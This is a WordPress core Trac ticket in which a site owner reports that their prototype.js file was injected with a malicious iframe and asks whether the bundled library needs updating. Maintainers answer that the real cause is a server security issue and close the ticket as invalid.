WordPress.org

Make WordPress Core

Opened 7 years ago

Closed 7 years ago

#7955 closed defect (bug) (invalid)

Prototype.js needs an update.

Reported by: SupersonicSquirrel Owned by:
Milestone: Priority: high
Severity: major Version: 2.6.1
Component: Administration Keywords: prototype.js javascript
Focuses: Cc:

Description

(I hope I'm doing this right, as it's clearly not a forum topic, but a serious issue.)

I have experienced hacking of my prototype.js file on a high-traffic website a couple of times within the recent week and each time malicious code would be added to it in order to open an inline frame leading to a website that was automatically downloading Trojans to a visitor's computer.

Of course, I always update my installation of WordPress within 1-2 hours from when an update is available (and I obviously use 2.6.3 and not 2.6.1...), the only writeable files on my server are the sitemaps; I know how to protect my files and folders; so I assume this is an issue that could repeat on someone else's website as well.

From what I can see, the file on http://www.prototypejs.org/download is different from the file included with WordPress. I wonder if updating the file included in wp-includes/js/ would change anything.

I'm sorry if I wasted anyone's time here. When I report a vulnerability at the forum, I get response from newbies telling me stupid things.

Change History (2)

comment:1 @Viper007Bond7 years ago

If you actual prototype.js file is being modified, then you have a server security issue.

comment:2 @ryan7 years ago

  • Milestone 2.7 deleted
  • Resolution set to invalid
  • Status changed from new to closed

We're not on the latest version of prototype, but the latest doesn't address security issues. Prototype is not the problem. We plan to update prototype for WP 2.8.

Note: See TracTickets for help on using tickets.